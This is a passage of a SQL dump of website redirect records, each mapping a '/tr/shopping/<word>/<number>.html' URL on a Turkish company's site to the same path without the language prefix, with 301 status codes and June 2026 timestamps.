05:29:48','0000-00-00 00:00:00',301),(73288,'https://3s-technologies.com.tr/tr/shopping/oratoriously/3498691321.html',NULL,'https://3s-technologies.com.tr/shopping/oratoriously/3498691321.html','',1,0,'2026-06-11 05:29:51','0000-00-00 00:00:00',301),(73289,'https://3s-technologies.com.tr/tr/shopping/lithology/1594045462.html',NULL,'https://3s-technologies.com.tr/shopping/lithology/1594045462.html','',1,0,'2026-06-11 05:29:54','0000-00-00 00:00:00',301),(73290,'https://3s-technologies.com.tr/tr/shopping/hypoxanthin/1544783433.html',NULL,'https://3s-technologies.com.tr/shopping/hypoxanthin/1544783433.html','',1,0,'2026-06-11 05:29:57','0000-00-00 00:00:00',301),(73291,'https://3s-technologies.com.tr/tr/shopping/carcinogen/3523086882.html',NULL,'https://3s-technologies.com.tr/shopping/carcinogen/3523086882.html','',1,0,'2026-06-11 05:30:05','0000-00-00 00:00:00',301),(73292,'https://3s-technologies.com.tr/tr/shopping/wedgebill/2836593568.html',NULL,'https://3s-technologies.com.tr/shopping/wedgebill/2836593568.html','',1,0,'2026-06-11 05:30:08','0000-00-00 00:00:00',301),(73293,'https://3s-technologies.com.tr/tr/shopping/disglorified/2855324228.html',NULL,'https://3s-technologies.com.tr/shopping/disglorified/2855324228.html','',1,0,'2026-06-11 05:30:11','0000-00-00 00:00:00',301),(73294,'https://3s-technologies.com.tr/tr/shopping/sheepy/4275179693.html',NULL,'https://3s-technologies.com.tr/shopping/sheepy/4275179693.html','',1,0,'2026-06-11 05:30:14','0000-00-00 00:00:00',301),(73295,'https://3s-technologies.com.tr/tr/shopping/exaltate/1610849125.html',NULL,'https://3s-technologies.com.tr/shopping/exaltate/1610849125.html','',1,0,'2026-06-11 05:30:17','0000-00-00 00:00:00',301),(73296,'https://3s-technologies.com.tr/tr/shopping/unscrupulously/2593930908.html',NULL,'https://3s-technologies.com.tr/shopping/unscrupulously/2593930908.html','',1,0,'2026-06-11 05:30:20','0000-00-00 00:00:00',301),(73297,'https://3s-technologies.com.tr/tr/shopping/ptilostomus/2652381776.html',NULL,'https://3s-technologies.com.tr/shopping/ptilostomus/2652381776.html','',1,0,'2026-06-11 05:30:24','0000-00-00 00:00:00',301),(73298,'https://3s-technologies.com.tr/tr/shopping/inferno/1007109603.html',NULL,'https://3s-technologies.com.tr/shopping/inferno/1007109603.html','',1,0,'2026-06-11 05:30:26','0000-00-00 00:00:00',301),(73299,'https://3s-technologies.com.tr/tr/shopping/westling/523137468.html',NULL,'https://3s-technologies.com.tr/shopping/westling/523137468.html','',1,0,'2026-06-11 05:30:30','0000-00-00 00:00:00',301),(73300,'https://3s-technologies.com.tr/tr/shopping/chaetotaxy/1696437573.html',NULL,'https://3s-technologies.com.tr/shopping/chaetotaxy/1696437573.html','',1,0,'2026-06-11 05:30:32','0000-00-00 00:00:00',301),(73301,'https://3s-technologies.com.tr/tr/shopping/lomaria/117553533.html',NULL,'https://3s-technologies.com.tr/shopping/lomaria/117553533.html','',1,0,'2026-06-11 05:30:35','0000-00-00 00:00:00',301),(73302,'https://3s-technologies.com.tr/tr/shopping/phyllocladium/3168243802.html',NULL,'https://3s-technologies.com.tr/shopping/phyllocladium/3168243802.html','',1,0,'2026-06-11 05:30:38','0000-00-00 00:00:00',301),(73303,'https://3s-technologies.com.tr/tr/shopping/prehensilis/310256693.html',NULL,'https://3s-technologies.com.tr/shopping/prehensilis/310256693.html','',1,0,'2026-06-11 05:30:41','0000-00-00 00:00:00',301),(73304,'https://3s-technologies.com.tr/tr/shopping/convictism/2165365254.html',NULL,'https://3s-technologies.com.tr/shopping/convictism/2165365254.html','',1,0,'2026-06-11 05:30:49','0000-00-00 00:00:00',301),(73305,'https://3s-technologies.com.tr/tr/shopping/calvinist/3219336342.html',NULL,'https://3s-technologies.com.tr/shopping/calvinist/3219336342.html','',1,0,'2026-06-11 05:30:51','0000-00-00 00:00:00',301),(73306,'https://3s-technologies.com.tr/tr/shopping/pygmaeus/1392661021.html',NULL,'https://3s-technologies.com.tr/shopping/pygmaeus/1392661021.html','',1,0,'2026-06-11 05:30:54','0000-00-00 00:00:00',301),(73307,'https://3s-technologies.com.tr/tr/shopping/blasphemous/3859216798.html',NULL,'https://3s-technologies.com.tr/shopping/blasphemous/3859216798.html','',1,0,'2026-06-11 05:30:57','0000-00-00 00:00:00',301),(73308,'https://3s-technologies.com.tr/tr/shopping/caprylic/4058151557.html',NULL,'https://3s-technologies.com.tr/shopping/caprylic/4058151557.html','',1,0,'2026-06-11 05:31:00','0000-00-00 00:00:00',301),(73309,'https://3s-technologies.com.tr/tr/shopping/coleopteral/843945778.html',NULL,'https://3s-technologies.com.tr/shopping/coleopteral/843945778.html','',1,0,'2026-06-11 05:31:03','0000-00-00 00:00:00',301),(73310,'https://3s-technologies.com.tr/tr/shopping/selvagee/2576575854.html',NULL,'https://3s-technologies.com.tr/shopping/selvagee/2576575854.html','',1,0,'2026-06-11 05:31:06','0000-00-00 00:00:00',301),(73311,'https://3s-technologies.com.tr/tr/shopping/scarabaeus/1937162896.html',NULL,'https://3s-technologies.com.tr/shopping/scarabaeus/1937162896.html','',1,0,'2026-06-11 05:31:09','0000-00-00 00:00:00',301),(73312,'https://3s-technologies.com.tr/tr/shopping/particolor/3735526198.html',NULL,'https://3s-technologies.com.tr/shopping/particolor/3735526198.html','',1,0,'2026-06-11 05:31:13','0000-00-00 00:00:00',301),(73313,'https://3s-technologies.com.tr/tr/shopping/osteoperiostitis/2088735678.html',NULL,'https://3s-technologies.com.tr/shopping/osteoperiostitis/2088735678.html','',1,0,'2026-06-11 05:31:15','0000-00-00 00:00:00',301),(73314,'https://3s-technologies.com.tr/tr/shopping/seldshewn/3524329511.html',NULL,'https://3s-technologies.com.tr/shopping/seldshewn/3524329511.html','',1,0,'2026-06-11 05:31:19','0000-00-00 00:00:00',301),(73315,'https://3s-technologies.com.tr/tr/shopping/sialogogue/2675574609.html',NULL,'https://3s-technologies.com.tr/shopping/sialogogue/2675574609.html','',1,0,'2026-06-11 05:31:22','0000-00-00 00:00:00',301),(73316,'https://3s-technologies.com.tr/tr/shopping/auriscalp/3305584938.html',NULL,'https://3s-technologies.com.tr/shopping/auriscalp/3305584938.html','',1,0,'2026-06-11 05:31:25','0000-00-00 00:00:00',301),(73317,'https://3s-technologies.com.tr/tr/shopping/debonair/4194748091.html',NULL,'https://3s-technologies.com.tr/shopping/debonair/4194748091.html','',1,0,'2026-06-11 05:31:28','0000-00-00 00:00:00',301),(73318,'https://3s-technologies.com.tr/tr/shopping/messias/1803259964.html',NULL,'https://3s-technologies.com.tr/shopping/messias/1803259964.html','',1,0,'2026-06-11 05:31:30','0000-00-00 00:00:00',301),(73319,'https://3s-technologies.com.tr/tr/shopping/mythoplasm/1917277986.html',NULL,'https://3s-technologies.com.tr/shopping/mythoplasm/1917277986.html','',1,0,'2026-06-11 05:31:34','0000-00-00 00:00:00',301),(73320,'https://3s-technologies.com.tr/tr/shopping/batavian/3160114818.html',NULL,'https://3s-technologies.com.tr/shopping/batavian/3160114818.html','',1,0,'2026-06-11 05:31:36','0000-00-00 00:00:00',301),(73321,'https://3s-technologies.com.tr/tr/shopping/vaccinia/351754872.html',NULL,'https://3s-technologies.com.tr/shopping/vaccinia/351754872.html','',1,0,'2026-06-11 05:31:40','0000-00-00 00:00:00',301),(73322,'https://3s-technologies.com.tr/tr/shopping/siredon/2481511950.html',NULL,'https://3s-technologies.com.tr/shopping/siredon/2481511950.html','',1,0,'2026-06-11 05:31:46','0000-00-00 00:00:00',301),(73323,'https://3s-technologies.com.tr/tr/shopping/bimuscular/2473640852.html',NULL,'https://3s-technologies.com.tr/shopping/bimuscular/2473640852.html','',1,0,'2026-06-11 05:31:48','0000-00-00 00:00:00',301),(73324,'https://3s-technologies.com.tr/tr/shopping/magneticalness/3941845371.html',NULL,'https://3s-technologies.com.tr/shopping/magneticalness/3941845371.html','',1,0,'2026-06-11 05:31:51','0000-00-00 00:00:00',301),(73325,'https://3s-technologies.com.tr/tr/shopping/naevia/2725538953.html',NULL,'https://3s-technologies.com.tr/shopping/naevia/2725538953.html','',1,0,'2026-06-11 05:31:54','0000-00-00 00:00:00',301),(73326,'https://3s-technologies.com.tr/tr/shopping/atharvaveda/4160527001.html',NULL,'https://3s-technologies.com.tr/shopping/atharvaveda/4160527001.html','',1,0,'2026-06-11 05:31:57','0000-00-00 00:00:00',301),(73327,'https://3s-technologies.com.tr/tr/shopping/calorifere/3372033680.html',NULL,'https://3s-technologies.com.tr/shopping/calorifere/3372033680.html','',1,0,'2026-06-11 05:32:00','0000-00-00 00:00:00',301),(73328,'https://3s-technologies.com.tr/tr/shopping/foreskirt/448670260.html',NULL,'https://3s-technologies.com.tr/shopping/foreskirt/448670260.html','',1,0,'2026-06-11 05:32:03','0000-00-00 00:00:00',301),(73329,'https://3s-technologies.com.tr/tr/shopping/urnal/619823433.html',NULL,'https://3s-technologies.com.tr/shopping/urnal/619823433.html','',1,0,'2026-06-11 05:32:07','0000-00-00 00:00:00',301),(73330,'https://3s-technologies.com.tr/tr/shopping/tepefy/2968734259.html',NULL,'https://3s-technologies.com.tr/shopping/tepefy/2968734259.html','',1,0,'2026-06-11 05:32:09','0000-00-00 00:00:00',301),(73331,'https://3s-technologies.com.tr/tr/shopping/homologically/2597471120.html',NULL,'https://3s-technologies.com.tr/shopping/homologically/2597471120.html','',1,0,'2026-06-11 05:32:14','0000-00-00 00:00:00',301),(73332,'https://3s-technologies.com.tr/tr/shopping/ornatus/3990664970.html',NULL,'https://3s-technologies.com.tr/shopping/ornatus/3990664970.html','',1,0,'2026-06-11 05:32:22','0000-00-00 00:00:00',301),(73333,'https://3s-technologies.com.tr/tr/shopping/lilacin/289361427.html',NULL,'https://3s-technologies.com.tr/shopping/lilacin/289361427.html','',1,0,'2026-06-11 05:32:25','0000-00-00 00:00:00',301),(73334,'https://3s-technologies.com.tr/tr/shopping/echidnophaga/2884626414.html',NULL,'https://3s-technologies.com.tr/shopping/echidnophaga/2884626414.html','',1,0,'2026-06-11 05:32:29','0000-00-00 00:00:00',301),(73335,'https://3s-technologies.com.tr/tr/shopping/hydrochelidon/2496449632.html',NULL,'https://3s-technologies.com.tr/shopping/hydrochelidon/2496449632.html','',1,0,'2026-06-11 05:32:34','0000-00-00 00:00:00',301),(73336,'https://3s-technologies.com.tr/tr/shopping/gallivat/894140999.html',NULL,'https://3s-technologies.com.tr/shopping/gallivat/894140999.html','',1,0,'2026-06-11 05:32:37','0000-00-00 00:00:00',301),(73337,'https://3s-technologies.com.tr/tr/shopping/guanidin/1267455147.html',NULL,'https://3s-technologies.com.tr/shopping/guanidin/1267455147.html','',1,0,'2026-06-11 05:32:39','0000-00-00 00:00:00',301),(73338,'https://3s-technologies.com.tr/tr/shopping/periphrase/2460837710.html',NULL,'https://3s-technologies.com.tr/shopping/periphrase/2460837710.html','',1,0,'2026-06-11 05:32:43','0000-00-00 00:00:00',301),(73339,'https://3s-technologies.com.tr/tr/shopping/sanctitude/1505196698.html',NULL,'https://3s-technologies.com.tr/shopping/sanctitude/1505196698.html','',1,0,'2026-06-11 05:32:46','0000-00-00 00:00:00',301),(73340,'https://3s-technologies.com.tr/tr/shopping/housecraft/1838391352.html',NULL,'https://3s-technologies.com.tr/shopping/housecraft/1838391352.html','',1,0,'2026-06-11 05:32:49','0000-00-00 00:00:00',301),(73341,'https://3s-technologies.com.tr/tr/shopping/automobile/2433409960.html',NULL,'https://3s-technologies.com.tr/shopping/automobile/2433409960.html','',1,0,'2026-06-11 05:32:52','0000-00-00 00:00:00',301),(73342,'https://3s-technologies.com.tr/tr/shopping/zechin/2288243015.html',NULL,'https://3s-technologies.com.tr/shopping/zechin/2288243015.html','',1,0,'2026-06-11 05:32:55','0000-00-00 00:00:00',301),(73343,'https://3s-technologies.com.tr/tr/shopping/promiscuously/3543982132.html',NULL,'https://3s-technologies.com.tr/shopping/promiscuously/3543982132.html','',1,0,'2026-06-11 05:32:58','0000-00-00 00:00:00',301),(73344,'https://3s-technologies.com.tr/tr/shopping/overawful/2714764383.html',NULL,'https://3s-technologies.com.tr/shopping/overawful/2714764383.html','',1,0,'2026-06-11 05:33:01','0000-00-00 00:00:00',301),(73345,'https://3s-technologies.com.tr/tr/shopping/salsuginous/1469552411.html',NULL,'https://3s-technologies.com.tr/shopping/salsuginous/1469552411.html','',1,0,'2026-06-11 05:33:04','0000-00-00 00:00:00',301),(73346,'https://3s-technologies.com.tr/tr/shopping/eugenia/2231703446.html',NULL,'https://3s-technologies.com.tr/shopping/eugenia/2231703446.html','',1,0,'2026-06-11 05:33:07','0000-00-00 00:00:00',301),(73347,'https://3s-technologies.com.tr/tr/shopping/whorl/746077899.html',NULL,'https://3s-technologies.com.tr/shopping/whorl/746077899.html','',1,0,'2026-06-11 05:33:10','0000-00-00 00:00:00',301),(73348,'https://3s-technologies.com.tr/tr/shopping/gazement/1066089483.html',NULL,'https://3s-technologies.com.tr/shopping/gazement/1066089483.html','',1,0,'2026-06-11 05:33:13','0000-00-00 00:00:00',301),(73349,'https://3s-technologies.com.tr/tr/shopping/asomatous/4287253440.html',NULL,'https://3s-technologies.com.tr/shopping/asomatous/4287253440.html','',1,0,'2026-06-11 05:33:16','0000-00-00 00:00:00',301),(73350,'https://3s-technologies.com.tr/tr/shopping/carbonic/4089908471.html',NULL,'https://3s-technologies.com.tr/shopping/carbonic/4089908471.html','',1,0,'2026-06-11 05:33:19','0000-00-00 00:00:00',301),(73351,'https://3s-technologies.com.tr/tr/shopping/truepenny/1595728692.html',NULL,'https://3s-technologies.com.tr/shopping/truepenny/1595728692.html','',1,0,'2026-06-11 05:33:22','0000-00-00 00:00:00',301),(73352,'https://3s-technologies.com.tr/tr/shopping/prothonotary/3965951588.html',NULL,'https://3s-technologies.com.tr/shopping/prothonotary/3965951588.html','',1,0,'2026-06-11 05:33:25','0000-00-00 00:00:00',301),(73353,'https://3s-technologies.com.tr/tr/shopping/apothegmatic/566433342.html',NULL,'https://3s-technologies.com.tr/shopping/apothegmatic/566433342.html','',1,0,'2026-06-11 05:33:28','0000-00-00 00:00:00',301),(73354,'https://3s-technologies.com.tr/tr/shopping/galeorhinus/2336747834.html',NULL,'https://3s-technologies.com.tr/shopping/galeorhinus/2336747834.html','',1,0,'2026-06-11 05:33:31','0000-00-00 00:00:00',301),(73355,'https://3s-technologies.com.tr/tr/shopping/teretous/851996625.html',NULL,'https://3s-technologies.com.tr/shopping/teretous/851996625.html','',1,0,'2026-06-11 05:33:34','0000-00-00 00:00:00',301),(73356,'https://3s-technologies.com.tr/tr/shopping/honeybird/732755145.html',NULL,'https://3s-technologies.com.tr/shopping/honeybird/732755145.html','',1,0,'2026-06-11 05:33:39','0000-00-00 00:00:00',301),(73357,'https://3s-technologies.com.tr/tr/shopping/benevolently/1132503623.html',NULL,'https://3s-technologies.com.tr/shopping/benevolently/1132503623.html','',1,0,'2026-06-11 05:33:41','0000-00-00 00:00:00',301),(73358,'https://3s-technologies.com.tr/tr/shopping/variegated/1887282439.html',NULL,'https://3s-technologies.com.tr/shopping/variegated/1887282439.html','',1,0,'2026-06-11 05:33:44','0000-00-00 00:00:00',301),(73359,'https://3s-technologies.com.tr/tr/shopping/grosgrain/1436583382.html',NULL,'https://3s-technologies.com.tr/shopping/grosgrain/1436583382.html','',1,0,'2026-06-11 05:33:47','0000-00-00 00:00:00',301),(73360,'https://3s-technologies.com.tr/tr/shopping/literary/2706067325.html',NULL,'https://3s-technologies.com.tr/shopping/literary/2706067325.html','',1,0,'2026-06-11 05:33:52','0000-00-00 00:00:00',301),(73361,'https://3s-technologies.com.tr/tr/shopping/reinaugurate/955354726.html',NULL,'https://3s-technologies.com.tr/shopping/reinaugurate/955354726.html','',1,0,'2026-06-11 05:33:54','0000-00-00 00:00:00',301),(73362,'https://3s-technologies.com.tr/tr/shopping/afterpains/2817225197.html',NULL,'https://3s-technologies.com.tr/shopping/afterpains/2817225197.html','',1,0,'2026-06-11 05:33:57','0000-00-00 00:00:00',301),(73363,'https://3s-technologies.com.tr/tr/shopping/unacquaintedness/2360545633.html',NULL,'https://3s-technologies.com.tr/shopping/unacquaintedness/2360545633.html','',1,0,'2026-06-11 05:34:00','0000-00-00 00:00:00',301),(73364,'https://3s-technologies.com.tr/tr/shopping/coronopifolia/1896853851.html',NULL,'https://3s-technologies.com.tr/shopping/coronopifolia/1896853851.html','',1,0,'2026-06-11 05:34:03','0000-00-00 00:00:00',301),(73365,'https://3s-technologies.com.tr/tr/shopping/tafferel/3772560785.html',NULL,'https://3s-technologies.com.tr/shopping/tafferel/3772560785.html','',1,0,'2026-06-11 05:34:06','0000-00-00 00:00:00',301),(73366,'https://3s-technologies.com.tr/tr/shopping/sevres/4206042257.html',NULL,'https://3s-technologies.com.tr/shopping/sevres/4206042257.html','',1,0,'2026-06-11 05:34:09','0000-00-00 00:00:00',301),(73367,'https://3s-technologies.com.tr/tr/shopping/therapeutae/1309089344.html',NULL,'https://3s-technologies.com.tr/shopping/therapeutae/1309089344.html','',1,0,'2026-06-11 05:34:12','0000-00-00 00:00:00',301),(73368,'https://3s-technologies.com.tr/tr/shopping/malayana/2228241403.html',NULL,'https://3s-technologies.com.tr/shopping/malayana/2228241403.html','',1,0,'2026-06-11 05:34:18','0000-00-00 00:00:00',301),(73369,'https://3s-technologies.com.tr/tr/shopping/unwilling/1616650028.html',NULL,'https://3s-technologies.com.tr/shopping/unwilling/1616650028.html','',1,0,'2026-06-11 05:34:23','0000-00-00 00:00:00',301),(73370,'https://3s-technologies.com.tr/tr/shopping/antiputrescent/2954719002.html',NULL,'https://3s-technologies.com.tr/shopping/antiputrescent/2954719002.html','',1,0,'2026-06-11 05:34:26','0000-00-00 00:00:00',301),(73371,'https://3s-technologies.com.tr/tr/shopping/greeve/2301692400.html',NULL,'https://3s-technologies.com.tr/shopping/greeve/2301692400.html','',1,0,'2026-06-11 05:34:29','0000-00-00 00:00:00',301),(73372,'https://3s-technologies.com.tr/tr/shopping/leggiero/1720873067.html',NULL,'https://3s-technologies.com.tr/shopping/leggiero/1720873067.html','',1,0,'2026-06-11 05:34:33','0000-00-00 00:00:00',301),(73373,'https://3s-technologies.com.tr/tr/shopping/epaxial/1074572351.html',NULL,'https://3s-technologies.com.tr/shopping/epaxial/1074572351.html','',1,0,'2026-06-11 05:34:35','0000-00-00 00:00:00',301),(73374,'https://3s-technologies.com.tr/tr/shopping/adagial/2588130005.html',NULL,'https://3s-technologies.com.tr/shopping/adagial/2588130005.html','',1,0,'2026-06-11 05:34:38','0000-00-00 00:00:00',301),(73375,'https://3s-technologies.com.tr/tr/shopping/humbugged/2537632999.html',NULL,'https://3s-technologies.com.tr/shopping/humbugged/2537632999.html','',1,0,'2026-06-11 05:34:41','0000-00-00 00:00:00',301),(73376,'https://3s-technologies.com.tr/tr/shopping/hollowed/15352311.html',NULL,'https://3s-technologies.com.tr/shopping/hollowed/15352311.html','',1,0,'2026-06-11 05:34:47','0000-00-00 00:00:00',301),(73377,'https://3s-technologies.com.tr/tr/shopping/kahani/1713956150.html',NULL,'https://3s-technologies.com.tr/shopping/kahani/1713956150.html','',1,0,'2026-06-11 05:34:50','0000-00-00 00:00:00',301),(73378,'https://3s-technologies.com.tr/tr/shopping/trist/1824067661.html',NULL,'https://3s-technologies.com.tr/shopping/trist/1824067661.html','',1,0,'2026-06-11 05:34:53','0000-00-00 00:00:00',301),(73379,'https://3s-technologies.com.tr/tr/shopping/endoparasite/1524801728.html',NULL,'https://3s-technologies.com.tr/shopping/endoparasite/1524801728.html','',1,0,'2026-06-11 05:34:56','0000-00-00 00:00:00',301),(73380,'https://3s-technologies.com.tr/tr/shopping/corporealism/1045964873.html',NULL,'https://3s-technologies.com.tr/shopping/corporealism/1045964873.html','',1,0,'2026-06-11 05:35:04','0000-00-00 00:00:00',301),(73381,'https://3s-technologies.com.tr/tr/shopping/unkingship/921000675.html',NULL,'https://3s-technologies.com.tr/shopping/unkingship/921000675.html','',1,0,'2026-06-11 05:35:06','0000-00-00 00:00:00',301),(73382,'https://3s-technologies.com.tr/tr/shopping/neomalthusianism/3061768620.html',NULL,'https://3s-technologies.com.tr/shopping/neomalthusianism/3061768620.html','',1,0,'2026-06-11 05:35:09','0000-00-00 00:00:00',301),(73383,'https://3s-technologies.com.tr/tr/shopping/panniered/1412918592.html',NULL,'https://3s-technologies.com.tr/shopping/panniered/1412918592.html','',1,0,'2026-06-11 05:35:12','0000-00-00 00:00:00',301),(73384,'https://3s-technologies.com.tr/tr/shopping/sassorol/1027571958.html',NULL,'https://3s-technologies.com.tr/shopping/sassorol/1027571958.html','',1,0,'2026-06-11 05:35:25','0000-00-00 00:00:00',301),(73385,'https://3s-technologies.com.tr/tr/shopping/burghership/3900661972.html',NULL,'https://3s-technologies.com.tr/shopping/burghership/3900661972.html','',1,0,'2026-06-11 05:35:27','0000-00-00 00:00:00',301),(73386,'https://3s-technologies.com.tr/tr/shopping/poeticule/838277868.html',NULL,'https://3s-technologies.com.tr/shopping/poeticule/838277868.html','',1,0,'2026-06-11 05:35:30','0000-00-00 00:00:00',301),(73387,'https://3s-technologies.com.tr/tr/shopping/theanthropist/4134601536.html',NULL,'https://3s-technologies.com.tr/shopping/theanthropist/4134601536.html','',1,0,'2026-06-11 05:35:51','0000-00-00 00:00:00',301),(73388,'https://3s-technologies.com.tr/tr/shopping/victualler/3990193855.html',NULL,'https://3s-technologies.com.tr/shopping/victualler/3990193855.html','',1,0,'2026-06-11 05:35:55','0000-00-00 00:00:00',301),(73389,'https://3s-technologies.com.tr/tr/shopping/cadilesker/1428532535.html',NULL,'https://3s-technologies.com.tr/shopping/cadilesker/1428532535.html','',1,0,'2026-06-11 05:35:58','0000-00-00 00:00:00',301),(73390,'https://3s-technologies.com.tr/tr/shopping/pestful/1333484873.html',NULL,'https://3s-technologies.com.tr/shopping/pestful/1333484873.html','',1,0,'2026-06-11 05:36:08','0000-00-00 00:00:00',301),(73391,'https://3s-technologies.com.tr/tr/shopping/unforgettable/205212321.html',NULL,'https://3s-technologies.com.tr/shopping/unforgettable/205212321.html','',1,0,'2026-06-11 05:36:10','0000-00-00 00:00:00',301),(73392,'https://3s-technologies.com.tr/tr/shopping/spumeous/3253830077.html',NULL,'https://3s-technologies.com.tr/shopping/spumeous/3253830077.html','',1,0,'2026-06-11 05:36:13','0000-00-00 00:00:00',301),(73393,'https://3s-technologies.com.tr/tr/shopping/hyacinthaceae/611772586.html',NULL,'https://3s-technologies.com.tr/shopping/hyacinthaceae/611772586.html','',1,0,'2026-06-11 05:36:44','0000-00-00 00:00:00',301),(73394,'https://3s-technologies.com.tr/tr/shopping/lozengy/106125997.html',NULL,'https://3s-technologies.com.tr/shopping/lozengy/106125997.html','',1,0,'2026-06-11 05:36:47','0000-00-00 00:00:00',301),(73395,'https://3s-technologies.com.tr/tr/shopping/unacquaintance/3806164436.html',NULL,'https://3s-technologies.com.tr/shopping/unacquaintance/3806164436.html','',1,0,'2026-06-11 05:36:50','0000-00-00 00:00:00',301),(73396,'https://3s-technologies.com.tr/tr/shopping/inexperience/2995738878.html',NULL,'https://3s-technologies.com.tr/shopping/inexperience/2995738878.html','',1,0,'2026-06-11 05:36:58','0000-00-00 00:00:00',301),(73397,'https://3s-technologies.com.tr/tr/shopping/scouleri/1449427801.html',NULL,'https://3s-technologies.com.tr/shopping/scouleri/1449427801.html','',1,0,'2026-06-11 05:37:00','0000-00-00 00:00:00',301),(73398,'https://3s-technologies.com.tr/tr/shopping/presultor/1590005958.html',NULL,'https://3s-technologies.com.tr/shopping/presultor/1590005958.html','',1,0,'2026-06-11 05:37:03','0000-00-00 00:00:00',301),(73399,'https://3s-technologies.com.tr/tr/shopping/rabbinist/3237082172.html',NULL,'https://3s-technologies.com.tr/shopping/rabbinist/3237082172.html','',1,0,'2026-06-11 05:37:30','0000-00-00 00:00:00',301),(73400,'https://3s-technologies.com.tr/tr/shopping/neutrally/1969398129.html',NULL,'https://3s-technologies.com.tr/shopping/neutrally/1969398129.html','',1,0,'2026-06-11 05:37:33','0000-00-00 00:00:00',301),(73401,'https://3s-technologies.com.tr/tr/shopping/inheritress/2116469692.html',NULL,'https://3s-technologies.com.tr/shopping/inheritress/2116469692.html','',1,0,'2026-06-11 05:37:36','0000-00-00 00:00:00',301),(73402,'https://3s-technologies.com.tr/tr/shopping/hoteichiku/1731184589.html',NULL,'https://3s-technologies.com.tr/shopping/hoteichiku/1731184589.html','',1,0,'2026-06-11 05:37:43','0000-00-00 00:00:00',301),(73403,'https://3s-technologies.com.tr/tr/shopping/africa/2346010796.html',NULL,'https://3s-technologies.com.tr/shopping/africa/2346010796.html','',1,0,'2026-06-11 05:37:45','0000-00-00 00:00:00',301),(73404,'https://3s-technologies.com.tr/tr/shopping/paratoluidine/3011044371.html',NULL,'https://3s-technologies.com.tr/shopping/paratoluidine/3011044371.html','',1,0,'2026-06-11 05:37:48','0000-00-00 00:00:00',301),(73405,'https://3s-technologies.com.tr/tr/shopping/oxheal/1096650012.html',NULL,'https://3s-technologies.com.tr/shopping/oxheal/1096650012.html','',1,0,'2026-06-11 05:38:10','0000-00-00 00:00:00',301),(73406,'https://3s-technologies.com.tr/tr/shopping/flunkydom/2505241431.html',NULL,'https://3s-technologies.com.tr/shopping/flunkydom/2505241431.html','',1,0,'2026-06-11 05:38:13','0000-00-00 00:00:00',301),(73407,'https://3s-technologies.com.tr/tr/shopping/naturism/2729550296.html',NULL,'https://3s-technologies.com.tr/shopping/naturism/2729550296.html','',1,0,'2026-06-11 05:38:16','0000-00-00 00:00:00',301),(73408,'https://3s-technologies.com.tr/tr/shopping/heterauxesis/568386393.html',NULL,'https://3s-technologies.com.tr/shopping/heterauxesis/568386393.html','',1,0,'2026-06-11 05:38:47','0000-00-00 00:00:00',301),(73409,'https://3s-technologies.com.tr/tr/shopping/villanage/3271666491.html',NULL,'https://3s-technologies.com.tr/shopping/villanage/3271666491.html','',1,0,'2026-06-11 05:38:49','0000-00-00 00:00:00',301),(73410,'https://3s-technologies.com.tr/tr/shopping/insnarl/3778525195.html',NULL,'https://3s-technologies.com.tr/shopping/insnarl/3778525195.html','',1,0,'2026-06-11 05:38:52','0000-00-00 00:00:00',301),(73411,'https://3s-technologies.com.tr/tr/shopping/marsilia/3566876266.html',NULL,'https://3s-technologies.com.tr/shopping/marsilia/3566876266.html','',1,0,'2026-06-11 05:39:01','0000-00-00 00:00:00',301),(73412,'https://3s-technologies.com.tr/tr/shopping/microfilm/1636774622.html',NULL,'https://3s-technologies.com.tr/shopping/microfilm/1636774622.html','',1,0,'2026-06-11 05:39:03','0000-00-00 00:00:00',301),(73413,'https://3s-technologies.com.tr/tr/shopping/disworth/1724171587.html',NULL,'https://3s-technologies.com.tr/shopping/disworth/1724171587.html','',1,0,'2026-06-11 05:39:06','0000-00-00 00:00:00',301),(73414,'https://3s-technologies.com.tr/tr/shopping/feasibleness/1896382720.html',NULL,'https://3s-technologies.com.tr/shopping/feasibleness/1896382720.html','',1,0,'2026-06-11 05:40:07','0000-00-00 00:00:00',301),(73415,'https://3s-technologies.com.tr/tr/shopping/callistephus/3091929873.html',NULL,'https://3s-technologies.com.tr/shopping/callistephus/3091929873.html','',1,0,'2026-06-11 05:40:09','0000-00-00 00:00:00',301),(73416,'https://3s-technologies.com.tr/tr/shopping/hypinosis/1988368473.html',NULL,'https://3s-technologies.com.tr/shopping/hypinosis/1988368473.html','',1,0,'2026-06-11 05:40:12','0000-00-00 00:00:00',301),(73417,'https://3s-technologies.com.tr/tr/shopping/unseat/192630535.html',NULL,'https://3s-technologies.com.tr/shopping/unseat/192630535.html','',1,0,'2026-06-11 05:40:18','0000-00-00 00:00:00',301),(73418,'https://3s-technologies.com.tr/tr/shopping/filmy/1118920884.html',NULL,'https://3s-technologies.com.tr/shopping/filmy/1118920884.html','',1,0,'2026-06-11 05:40:20','0000-00-00 00:00:00',301),(73419,'https://3s-technologies.com.tr/tr/shopping/uncorruptible/3393803268.html',NULL,'https://3s-technologies.com.tr/shopping/uncorruptible/3393803268.html','',1,0,'2026-06-11 05:40:23','0000-00-00 00:00:00',301),(73420,'https://3s-technologies.com.tr/tr/shopping/actinomere/2986570689.html',NULL,'https://3s-technologies.com.tr/shopping/actinomere/2986570689.html','',1,0,'2026-06-11 05:40:31','0000-00-00 00:00:00',301),(73421,'https://3s-technologies.com.tr/tr/shopping/reverie/344107248.html',NULL,'https://3s-technologies.com.tr/shopping/reverie/344107248.html','',1,0,'2026-06-11 05:40:35','0000-00-00 00:00:00',301),(73422,'https://3s-technologies.com.tr/tr/shopping/monopolylogue/4155938213.html',NULL,'https://3s-technologies.com.tr/shopping/monopolylogue/4155938213.html','',1,0,'2026-06-11 05:40:38','0000-00-00 00:00:00',301),(73423,'https://3s-technologies.com.tr/tr/shopping/tetracera/3529304422.html',NULL,'https://3s-technologies.com.tr/shopping/tetracera/3529304422.html','',1,0,'2026-06-11 05:41:08','0000-00-00 00:00:00',301),(73424,'https://3s-technologies.com.tr/tr/shopping/luter/1548986114.html',NULL,'https://3s-technologies.com.tr/shopping/luter/1548986114.html','',1,0,'2026-06-11 05:41:11','0000-00-00 00:00:00',301),(73425,'https://3s-technologies.com.tr/tr/shopping/geology/2694639789.html',NULL,'https://3s-technologies.com.tr/shopping/geology/2694639789.html','',1,0,'2026-06-11 05:41:14','0000-00-00 00:00:00',301),(73426,'https://3s-technologies.com.tr/tr/shopping/greek/2255022926.html',NULL,'https://3s-technologies.com.tr/shopping/greek/2255022926.html','',1,0,'2026-06-11 05:41:24','0000-00-00 